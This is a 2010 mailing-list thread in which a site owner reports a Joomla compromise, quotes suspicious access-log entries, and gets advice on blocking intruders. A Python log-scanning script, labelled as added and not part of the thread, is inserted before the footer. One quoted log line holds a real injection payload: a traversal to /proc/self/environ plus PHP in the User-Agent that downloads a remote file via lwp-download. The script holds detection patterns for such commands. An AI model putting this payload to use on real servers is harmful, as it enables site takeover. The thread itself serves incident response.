[thelist] block phishing
James O'Donnell
jimmyropes at gmail.com
Sun Mar 28 11:49:29 CDT 2010
Robots.txt only works if the robot is a legitimate one that honors your
wishes.
A rogue will just go to whatever folder it wants to access regardless of
what rules are stated in robots.txt.
-----Original Message-----
From: thelist-bounces at lists.evolt.org
[mailto:thelist-bounces at lists.evolt.org] On Behalf Of Bob Meetin
Sent: Sunday, 28 March, 2010 12:20
To: thelist at lists.evolt.org
Subject: [thelist] block phishing
I got a notice that one of my sites got hit yesterday, so I logged in,
and identified the file mentioned, also found a couple php files that
got dropped into webhome that were related. I moved the files into an
out of webroot folder for future scrutinization, then checked the server
access log, found a number of entries at the approximate date stamp of
the uploaded files that seemed to be related.
I am methodically going through the system looking for anything not
locked down. What I could use some help with is understanding if the
access log entries are associated and how to lock out the intruders. As
IP addresses change I suspect it's more than simply editing the
robots.txt or adding a line in the .htaccess. Some of the suspicious
entries look like:
123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200
18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1"
200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U;
Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET
CLR 3.5.30729)"
fat.php was one of the deposited files. 18:58 was the datestamp.
75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET
/administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Related? There is nothing (current) in the filesystem called host.php
80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET
/index.php?option=com_sectionex&controller=../../../../../../../../../../../
../../../../../../../../../../../../../proc/self/environ%00%0F
HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download
http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt
print_out.php');?>"
com_sectionex is a Joomla component. There is also no legitimate file
called print_out.php, but I found one.
75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET
/administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Suggestions for robots.txt:
#Baiduspider
User-agent: Baiduspider
Disallow: /
#Others
User-agent: *
Disallow: /
Suggestions for .htaccess:
<Files *.*>
order allow,deny
allow from all
deny from 220.181.
</Files>
-Bob
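As an added illustration (not part of the thread), a small Python script that parses the access-log entries Bob quoted and applies James's point: robots.txt is only honoured by well-behaved crawlers, so what actually helps is inspecting the log server-side and denying the offending clients in .htaccess. The KNOWN_PHP allowlist and the PAYLOAD-HOST placeholder are assumptions; the Baidu entry is deliberately not flagged.

```python
import re
from urllib.parse import unquote

# Constructed sample: the wrapped log entries quoted above, re-joined; payload host is a placeholder.
SAMPLE_LOG = [
    '123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 "-" '
    '"Baiduspider+(+http://www.baidu.com/search/spider.htm)"',
    '83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 200 8015 '
    '"http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0) Firefox/3.5.2"',
    '75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET /administrator/host.php HTTP/1.0" '
    '200 73956 "-" "\\"Mozilla/4.0"',
    '80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex'
    '&controller=../../../../proc/self/environ%00%0F HTTP/1.1" 200 1423 "-" '
    '"<? shell_exec(\'lwp-download http://PAYLOAD-HOST/tv.txt;mv tv.txt print_out.php\');?>"',
]
# Apache combined log format; User-Agent is matched greedily since it may contain a quote (\"Mozilla/4.0).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# Assumed allowlist of PHP entry points that legitimately exist on this Joomla site.
KNOWN_PHP = {"/index.php", "/administrator/index.php"}


def classify(line):
    """Return (client ip, reasons); reasons is empty when nothing looks hostile."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparseable line"]
    path = unquote(m["path"])  # decode %00 and friends before inspecting
    script = path.split("?", 1)[0]
    reasons = []
    if "../" in path or "/proc/self/environ" in path:
        reasons.append("path traversal")
    if "\x00" in path:
        reasons.append("null byte in request")
    if re.search(r"<\?|shell_exec|lwp-download", path + " " + m["ua"], re.I):
        reasons.append("PHP code or download command in request/User-Agent")
    if script.endswith(".php") and script not in KNOWN_PHP:
        reasons.append("request for PHP script not on the allowlist")
    if reasons and m["status"].startswith("2"):
        reasons.append("answered 2xx, i.e. the request succeeded")
    return m["ip"], reasons


def deny_rules(lines):
    """Collect flagged client IPs as Apache 2.2 'deny from' lines for .htaccess."""
    ips = sorted({ip for ip, r in map(classify, lines) if ip and r})
    return "\n".join(f"deny from {ip}" for ip in ips)
```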
--
* * Please support the community that supports you. * *
http://evolt.org/help_support_evolt/
For unsubscribe and other options, including the Tip Harvester
and archives of thelist go to: http://lists.evolt.org
Workers of the Web, evolt !